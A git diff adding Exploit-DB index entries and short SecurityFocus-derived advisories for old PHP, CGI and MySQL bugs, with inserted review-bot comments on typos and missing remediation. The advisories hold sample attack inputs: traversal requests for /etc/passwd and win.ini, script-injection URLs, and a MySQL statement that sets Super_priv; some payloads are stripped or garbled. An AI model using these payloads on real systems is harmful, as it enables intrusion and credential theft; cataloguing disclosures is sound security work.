diff --git a/files.csv b/files.csv
index 55aea54ec..5b04ec274 100755
--- a/files.csv
+++ b/files.csv
@@ -31314,3 +31314,20 @@ id,file,description,date,author,platform,type,port
 34777,platforms/cgi/remote/34777.rb,"GNU bash Environment Variable Command Injection (MSF)",2014-09-25,"Shaun Colley",cgi,remote,0
 34779,platforms/hardware/webapps/34779.pl,"Nucom ADSL ADSLR5000UN ISP Credentials Disclosure",2014-09-25,"Sebastián Magof",hardware,webapps,80
 34781,platforms/php/webapps/34781.txt,"Wordpress All In One WP Security Plugin 3.8.2 - SQL Injection",2014-09-25,"High-Tech Bridge SA",php,webapps,80
+34782,platforms/php/webapps/34782.txt,"NetArt Media Car Portal 2.0 'car' Parameter SQL Injection Vulnerability",2010-09-27,RoAd_KiLlEr,php,webapps,0
+34783,platforms/php/webapps/34783.txt,"Scriptsez Ultimate Poll 'demo_page.php' Cross Site Scripting Vulnerability",2009-07-16,Moudi,php,webapps,0
+34784,platforms/php/webapps/34784.txt,"Micro CMS 1.0 'name' Field HTML Injection Vulnerability",2010-09-28,"Veerendra G.G",php,webapps,0
+34785,platforms/php/webapps/34785.txt,"phpMyFAQ 2.6.x 'index.php' Cross Site Scripting Vulnerability",2010-09-28,"Yam Mesicka",php,webapps,0
+34786,platforms/php/webapps/34786.txt,"eCardMAX Multiple Cross Site Scripting Vulnerabilities",2009-07-14,Moudi,php,webapps,0
+34787,platforms/php/webapps/34787.txt,"MODx 2.0.2-pl manager/index.php modahsh Parameter XSS",2010-09-29,"John Leitch",php,webapps,0
+34788,platforms/php/webapps/34788.txt,"MODx manager/controllers/default/resource/tvs.php class_key Parameter Traversal Local File Inclusion",2010-09-29,"John Leitch",php,webapps,0
+34789,platforms/php/webapps/34789.html,"GetSimple CMS 2.01 'admin/changedata.php' Cross Site Scripting Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0
+34790,platforms/php/webapps/34790.txt,"Pluck 4.6.3 'cont1' Parameter HTML Injection Vulnerability",2010-09-29,"High-Tech Bridge SA",php,webapps,0
+34791,platforms/php/webapps/34791.txt,"Swinger Club Portal start.php id Parameter SQL Injection",2009-07-07,Moudi,php,webapps,0
+34792,platforms/php/webapps/34792.txt,"Swinger Club Portal start.php go Parameter Remote File Inclusion",2009-07-07,Moudi,php,webapps,0
+34793,platforms/php/webapps/34793.txt,"Top Paidmailer 'home.php' Remote File Include Vulnerability",2009-07-13,Moudi,php,webapps,0
+34794,platforms/cgi/webapps/34794.txt,"Intellicom Netbiter webSCADA Products 'read.cgi' Multiple Remote Security Vulnerabilities",2010-10-01,"Eugene Salov",cgi,webapps,0
+34795,platforms/php/webapps/34795.txt,"WebAsyst Shop-Script 'index.php' Cross Site Scripting Vulnerability",2009-07-09,Vrs-hCk,php,webapps,0
+34796,platforms/multiple/remote/34796.txt,"Oracle MySQL Prior to 5.1.50 Privilege Escalation Vulnerability",2010-08-03,"Libing Song",multiple,remote,0
+34797,platforms/php/webapps/34797.txt,"SurgeMail SurgeWeb 4.3e Cross Site Scripting Vulnerability",2010-10-04,"Kerem Kocaer",php,webapps,0
+34798,platforms/php/webapps/34798.txt,"ITS SCADA Username SQL Injection Vulnerability˛",2010-10-04,"Eugene Salov",php,webapps,0
diff --git a/platforms/cgi/webapps/34794.txt b/platforms/cgi/webapps/34794.txt
new file mode 100755
index 000000000..44382b83e
--- /dev/null
+++ b/platforms/cgi/webapps/34794.txt
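Review bot: In the files.csv hunk, the description of row 34798 ends with a stray `˛` inside the quoted title (`"ITS SCADA Username SQL Injection Vulnerability˛"`). This looks like an encoding artifact and will defeat exact-match searches on the title; unless it is only a rendering problem, the field should read `"ITS SCADA Username SQL Injection Vulnerability"`. All seventeen added rows also record port `0`, while the neighbouring web-application rows 34779 and 34781 record `80`, so anyone filtering the index by port will not see the new entries alongside the older ones.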
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43636/info
+
+Intellicom Netbiter webSCADA products are prone to multiple remote security vulnerabilities, including a directory-traversal vulnerability, an information-disclosure vulnerability, and an arbitrary-file-upload vulnerability.
+
+An attacker can exploit these issues to upload and execute arbitrary script code on an affected computer with the privileges of the webserver process, view arbitrary local files, or obtain sensitive data that can aid in further attacks.
+
+Netbiter webSCADA WS100 and Netbiter webSCADA WS200 are vulnerable; other versions may also be affected.
+
+http://www.example.com/cgi-bin/read.cgi?page=../../../../../../../../../../../etc/passwd%00
+http://www.example.com/gi-bin/read.cgi?file=/home/config/users.cfg
+http://www.example.com/cgi-bin/read.cgi?page=config.html&file=/home/config/pages/2.conf§ion=PAGE2
\ No newline at end of file
diff --git a/platforms/multiple/remote/34796.txt b/platforms/multiple/remote/34796.txt
new file mode 100755
index 000000000..c7d7a7784
--- /dev/null
+++ b/platforms/multiple/remote/34796.txt
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43677/info
+
+MySQL is prone to a remote privilege-escalation vulnerability.
+
+An attacker can exploit this issue to run arbitrary SQL statements with 'SUPER' privileges on the slave database system. This will allow the attacker to compromise the affected database system.
+
+This issue affects versions prior to MySQL 5.1.50.
+
+UPDATE db1.tbl1 /*!514900 ,mysql.user */
+SET db1.tbl1.col1=2 /*!514900 ,mysql.user.Super_priv='Y'
+WHERE mysql.user.User='user1'*/;
\ No newline at end of file
diff --git a/platforms/php/webapps/34782.txt b/platforms/php/webapps/34782.txt
new file mode 100755
index 000000000..60c91be2c
--- /dev/null
+++ b/platforms/php/webapps/34782.txt
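Review bot: The second sample request in 34794.txt uses the path `/gi-bin/read.cgi` where the other two use `/cgi-bin/read.cgi`, and the third ends in `§ion=PAGE2`, which looks like `&section=PAGE2` after an `&sect` entity was decoded somewhere along the way. Anyone turning these lines into web-server log searches or filtering rules for `read.cgi` would copy the inconsistencies, so the text should be checked against the SecurityFocus source it cites. The record also names no fixed version or workaround; a closing line such as `Mitigation: restrict network access to the device web interface until a vendor fix is applied` would make it usable for triage.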
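Review bot: 34796.txt states the affected range (versions prior to MySQL 5.1.50) but gives no remediation or detection line. I would add `Remediation: upgrade replication slaves to MySQL 5.1.50 or later`, and say that the sample relies on version-conditional comments (`/*! ... */`) that reference `mysql.user`, since that is the pattern to look for when auditing replicated statements and binary logs. files.csv lists the entry as `multiple,remote`, although the text describes gaining 'SUPER' privileges on the slave and appears to assume the attacker can already submit SQL, so the classification deserves a second look.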
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43536/info
+
+Car Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+Car Portal 2.0 is vulnerable; other versions may also be affected.
+
+http://www.example.com/autoportal10/index.php?page=en_Home&car=[SQL Injection]
\ No newline at end of file
diff --git a/platforms/php/webapps/34783.txt b/platforms/php/webapps/34783.txt
new file mode 100755
index 000000000..76a0061a1
--- /dev/null
+++ b/platforms/php/webapps/34783.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/43552/info
+
+Ultimate Poll is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+http://www.example.com/up/demo_page.php?action=vote&pid=test_poll&clr=1>'>
\ No newline at end of file
diff --git a/platforms/php/webapps/34784.txt b/platforms/php/webapps/34784.txt
new file mode 100755
index 000000000..13ec6905c
--- /dev/null
+++ b/platforms/php/webapps/34784.txt
@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/43556/info
+
+Micro CMS is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Micro CMS 1.0 beta 1 is vulnerable; other versions may also be affected.
+
+
+ in "* Name" textbox in comment section and fill other sections properly.
diff --git a/platforms/php/webapps/34785.txt b/platforms/php/webapps/34785.txt
new file mode 100755
index 000000000..788897ac5
--- /dev/null
+++ b/platforms/php/webapps/34785.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43560/info
+
+phpMyFAQ is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+Versions prior to phpMyFAQ 2.6.9 are vulnerable.
+
+http://www.example.com/index.php/">
\ No newline at end of file
diff --git a/platforms/php/webapps/34786.txt b/platforms/php/webapps/34786.txt
new file mode 100755
index 000000000..3a7f76552
--- /dev/null
+++ b/platforms/php/webapps/34786.txt
@@ -0,0 +1,18 @@
+source: http://www.securityfocus.com/bid/43570/info
+
+eCardMAX is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+eCardMAX 2006 and 2008 are vulnerable; other versions may also be affected.
+
+http://www.example.com/standard_2006/grabber.php?grab_url=1%3Cscript%3Ealert(1192520984065)%3C/script%3E
+
+http://www.example.com/standard_2006/members.php?cs_message=1%3C/textarea%3E%3CScRiPt%20%0A%0D%3Ealert(846719933916)%3B%3C/ScRiPt%3E
+
+http://www.example.com/standard_2006/resource/games/memory/memory.php?step=show_ins&cat=1%3E%22%3E%3CScRiPt%20%0A%0D%3Ealert(1295561226285)%3B%3C/ScRiPt%3E
+
+http://www.www.example.com/gold_2008/resource/games/ephotohunt/ephotohunt.php?step=show_ins&cat=1>">
+
+
+
diff --git a/platforms/php/webapps/34787.txt b/platforms/php/webapps/34787.txt
new file mode 100755
index 000000000..9a2bf0540
--- /dev/null
+++ b/platforms/php/webapps/34787.txt
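Review bot: The fourth sample URL in 34786.txt uses the host `www.www.example.com`, unlike the three above it, which use `www.example.com`; the doubled label looks like a sanitisation slip and should be `www.example.com` so the placeholder host is consistent. The file also ends with three empty added lines that can be dropped. Since files.csv indexes this only as "Multiple Cross Site Scripting Vulnerabilities", a one-line list of the affected parameters visible in the samples (`grab_url`, `cs_message`, `cat`) would tell a maintainer which inputs need output encoding.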
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43577/info
+
+MODx is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MODx 2.0.2-pl is vulnerable; other versions may also be affected.
+
+http://www.example.com/modx/manager/index.php?modahsh=%22%3E%3Cscript%3Ealert(0)%3C/script%3E
\ No newline at end of file
diff --git a/platforms/php/webapps/34788.txt b/platforms/php/webapps/34788.txt
new file mode 100755
index 000000000..41c108b61
--- /dev/null
+++ b/platforms/php/webapps/34788.txt
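Review bot: 34787.txt carries the full two-issue description (local file include and cross-site scripting), but files.csv indexes it only as the `modahsh` XSS and it holds only that sample; 34788.txt repeats the same text word for word for the `class_key` file-include issue. A reader triaging from either file cannot tell which of the two issues it documents without consulting the index, and may count one advisory (BID 43577) twice. I would trim each description to its own issue, or add a cross-reference line such as `See also: 34788 (class_key local file inclusion, same BID)` here and the matching line in 34788.txt.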
@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/43577/info
+
+MODx is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
+
+An attacker can exploit the local file-include vulnerability using directory-traversal strings to view and execute local files within the context of the webserver process. Information harvested may aid in further attacks.
+
+The attacker may leverage the cross-site scripting issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
+
+MODx 2.0.2-pl is vulnerable; other versions may also be affected.
+
+http://www.example.com/modx/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
\ No newline at end of file
diff --git a/platforms/php/webapps/34789.html b/platforms/php/webapps/34789.html
new file mode 100755
index 000000000..e0820771c
--- /dev/null
+++ b/platforms/php/webapps/34789.html
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43593/info
+
+GetSimple CMS is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+GetSimple CMS 2.01 is vulnerable; prior versions may also be affected.
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/34790.txt b/platforms/php/webapps/34790.txt
new file mode 100755
index 000000000..86f2dd554
--- /dev/null
+++ b/platforms/php/webapps/34790.txt
@@ -0,0 +1,17 @@
+source: http://www.securityfocus.com/bid/43597/info
+
+Pluck is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content.
+
+Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
+
+Pluck 4.6.3 is vulnerable; other versions may also be affected.
+
+
+
\ No newline at end of file
diff --git a/platforms/php/webapps/34797.txt b/platforms/php/webapps/34797.txt
new file mode 100755
index 000000000..a2217b1c3
--- /dev/null
+++ b/platforms/php/webapps/34797.txt
@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/43679/info
+
+SurgeMail is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input.
+
+An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
+
+The issue affects version 4.3e; other versions may also be affected.
+
+http://www.example.com/surgeweb?username_ex="/>